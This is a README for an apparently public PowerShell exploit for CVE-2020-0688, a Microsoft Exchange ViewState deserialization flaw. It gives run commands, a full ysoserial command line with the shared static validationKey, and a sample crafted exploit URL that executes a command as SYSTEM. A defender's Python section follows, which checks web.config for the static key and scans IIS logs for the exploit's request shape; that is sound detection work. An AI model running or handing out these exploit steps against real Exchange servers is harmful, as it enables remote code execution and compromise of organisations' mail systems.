A remote code execution vulnerability exists in Microsoft Exchange Server when the server fails to properly create unique keys at install time.
Knowledge of the validation key allows an authenticated user with a mailbox to pass arbitrary objects to be deserialized by the web application, which runs as SYSTEM.
The bug is found in the Exchange Control Panel (ECP) component. The nature of the bug is quite simple. Instead of having randomly-generated keys on a per-installation basis, all installations of Microsoft Exchange Server have the same `validationKey` and `decryptionKey` values in `web.config`. These keys are used to provide security for ViewState. ViewState is server-side data that ASP.NET web applications store in serialized format on the client. The client provides this data back to the server via the `__VIEWSTATE` request parameter.
Due to the use of static keys, an authenticated attacker can trick the server into deserializing maliciously crafted ViewState data. With the help of YSoSerial.net, an attacker can execute arbitrary .NET code on the server in the context of the Exchange Control Panel web application, which runs as SYSTEM. (Source)
These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.
- PowerShell
```powershell
git clone https://github.com/MrTiz/CVE-2020-0688.git
PowerShell.exe -ExecutionPolicy Bypass -File .\CVE-2020-0688.ps1 -Url <url> -Username <username> -Password <password> -Command <command> -YsoserialPath <ysoserialpath>
PowerShell.exe -ExecutionPolicy Bypass -File .\CVE-2020-0688.ps1 -Url 'https://localhost' -Username 'domain\username' -Password 'REDACTED' -Command 'powershell whoami > C:/whoami.txt' -YsoserialPath 'C:\Users\User\Desktop\CVE-2020-0688\ysoserial\ysoserial.exe'
```
```text
[*] Start to exploit...
[+] Login url: https://localhost:443/owa/auth.owa
[*] Status code: 200
[+] Login successfully!
[*] Tring to get __VIEWSTATEGENERATOR...
[+] Done! __VIEWSTATEGENERATOR: B97B4E27
[*] Tring to get ASP.NET_SessionId...
[+] Done! ASP.NET_SessionId: 624abfff-85b6-4357-be8c-18a931cad256
C:\Users\User\Desktop\CVE-2020-0688\ysoserial\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell whoami > C:/whoami.txt" --validationalg="SHA1" --validationkey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" --generator="B97B4E27" --viewstateuserkey="624abfff-85b6-4357-be8c-18a931cad256" --islegacy --isdebug
[+] Exp url: https://localhost:443/ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyywYAAQAAAP%2F%2F%2F%[...]%2BDQoJIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZSA9ICJ7IHg6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lID0gIlN0YXJ0IiA%2BDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BcG93ZXJzaGVsbDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2BIndob2FtaSAmZ3Q7IEM6L3dob2FtaS50eHQiIDwvU3lzdGVtOlN0cmluZz4NCiAgICAgPC9PYmplY3REYXRhUHJvdmlkZXIuTWV0aG9kUGFyYW1ldGVycz4NCiAgICA8L09iamVjdERhdGFQcm92aWRlcj4NCjwvUmVzb3VyY2VEaWN0aW9uYXJ5Pgviru9bDCgMPT0snH0s0u%2BA6J37Fg%3D%3D
[*] Auto trigger payload...
[+] Status code: 500, Maybe success!
```
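For defenders, here is an added Python example (not part of this project) that covers the two points above: it flags a `web.config` whose `<machineKey>` still carries the shared static `validationKey` printed in the ysoserial command, and it scans IIS W3C log lines for `/ecp/` requests that carry `__VIEWSTATE` and `__VIEWSTATEGENERATOR` in the query string, which is the shape of the exploit URL in the output above. The log lines, their field order and the config snippet are constructed samples.

```python
import re
from urllib.parse import parse_qs

# Static validationKey shared by every unpatched Exchange install (the value quoted in the ysoserial command above).
STATIC_VALIDATION_KEY = "CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF"


def has_static_validation_key(web_config_text: str) -> bool:
    """Return True if the <machineKey> element in web.config still carries the shared static validationKey."""
    m = re.search(r'<machineKey\b[^>]*\bvalidationKey="([0-9A-Fa-f]+)"', web_config_text)
    return m is not None and m.group(1).upper() == STATIC_VALIDATION_KEY


def parse_w3c(lines):
    """Parse IIS W3C extended log lines into dicts, taking column names from the #Fields: header."""
    fields, rows = None, []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            rows.append(dict(zip(fields, line.split(" "))))
    return rows


def suspicious_ecp_requests(lines):
    """Return (client IP, user, status) for /ecp/ requests that carry ViewState in the query string.

    Normal ECP pages post __VIEWSTATE in the request body; __VIEWSTATE plus __VIEWSTATEGENERATOR
    in a GET query string matches the exploit URL shape shown in the output above.
    """
    hits = []
    for row in parse_w3c(lines):
        if not row.get("cs-uri-stem", "").lower().startswith("/ecp/"):
            continue
        query = parse_qs(row.get("cs-uri-query", ""))  # IIS writes "-" for an empty query; parse_qs yields {}
        if "__VIEWSTATE" in query and "__VIEWSTATEGENERATOR" in query:
            hits.append((row["c-ip"], row["cs-username"], row["sc-status"]))
    return hits


# Constructed sample inputs (not a real server's config or logs); the ViewState blob is truncated.
SAMPLE_WEB_CONFIG = '<machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" validation="SHA1" />'
SAMPLE_LOG = """#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
2020-02-26 10:00:01 GET /owa/auth/logon.aspx url=%2fowa%2f - 10.0.0.5 200
2020-02-26 10:00:09 POST /ecp/default.aspx - DOMAIN\\alice 10.0.0.5 200
2020-02-26 10:02:31 GET /ecp/default.aspx __VIEWSTATEGENERATOR=B97B4E27&__VIEWSTATE=%2FwEyywYAAQAAAP DOMAIN\\alice 10.0.0.5 500""".splitlines()

if __name__ == "__main__":
    print("static validationKey present:", has_static_validation_key(SAMPLE_WEB_CONFIG))
    for ip, user, status in suspicious_ecp_requests(SAMPLE_LOG):
        print(f"suspicious ECP ViewState request from {ip} as {user} -> HTTP {status}")
```

A hit followed by an HTTP 500 from `/ecp/default.aspx`, as in the output above, is worth correlating with process creation under the ECP application pool.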
Contributions are what make the open source community such a good place to learn, inspire, and create. Any contributions you can provide are greatly appreciated.
- Fork the Project
- Create your Feature Branch (`git checkout -b feature/AmazingFeature`)
- Commit your Changes (`git commit -m 'Add some AmazingFeature'`)
- Push to the Branch (`git push origin feature/AmazingFeature`)
- Open a Pull Request
This exploit was developed and published for educational and research purposes only. The author assumes no responsibility for any illegal use. Use it at your own risk and only against systems for which you are authorized to test it.
This project is licensed under the GNU General Public License v3.0 - see the LICENSE file for details.